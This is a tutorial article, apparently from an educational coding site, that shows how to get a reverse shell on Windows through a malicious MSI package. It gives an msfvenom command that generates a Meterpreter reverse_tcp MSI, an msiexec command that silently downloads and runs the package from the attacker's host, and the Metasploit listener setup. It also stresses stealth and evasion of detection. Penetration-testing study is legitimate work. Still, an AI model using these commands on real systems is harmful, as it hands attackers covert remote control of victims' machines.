Home Whiteboard Practice Code Graphing Calculator Online Compilers Articles Tools
Tutorials Courses Jobs

Get the Reverse Shell with MSI package

Computer Network Computer Engineering MCA

Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. The executable program that interprets packages and installs products is msiexec.exe.

In penetration testing, MSI packages can be leveraged to obtain reverse shells on target Windows systems. This technique exploits the legitimate Windows Installer functionality to execute malicious payloads.

How It Works

The MSI reverse shell technique works by creating a malicious MSI package containing a reverse shell payload. When executed on the target system using msiexec, the package triggers the payload to establish a connection back to the attacker's machine.

MSI Reverse Shell Attack Flow Attacker Creates MSI with payload Target Executes MSI via msiexec Listener Receives connection 1. Create malicious MSI ? 2. Execute on target ? 3. Establish reverse connection

Generating MSI Package with msfvenom

Use msfvenom to generate an MSI package file containing the Windows Meterpreter payload:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi

This command creates a malicious MSI file that, when executed, will attempt to connect back to the specified IP address and port.

Executing the MSI Package

On the target system, the victim executes the MSI file using the following command:

msiexec /q /i http://192.168.1.109/1.msi

The /q flag runs the installation quietly (without user interface), and /i specifies the installation package.

Setting Up the Listener

Before executing the MSI on the target, set up a listener using Metasploit's multi/handler:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.109
set lport 1234
exploit

Once the MSI package is executed on the target machine, the attacker receives a reverse shell connection through the established listener.

Key Points

  • Stealth execution − The /q flag ensures silent installation without alerting the user

  • Remote delivery − MSI packages can be hosted remotely and executed via HTTP URLs

  • Legitimate process − Uses Windows' built-in installer mechanism, making detection harder

  • Payload flexibility − Various payloads can be embedded within MSI packages

Conclusion

MSI packages provide an effective method for obtaining reverse shells by leveraging Windows' legitimate installer functionality. This technique combines msfvenom payload generation with msiexec execution to establish covert connections back to the attacker's system.

Updated on: 2026-03-16T23:36:12+05:30

2K+ Views

Kickstart Your Career

Get certified by completing the course

Get Started
Advertisements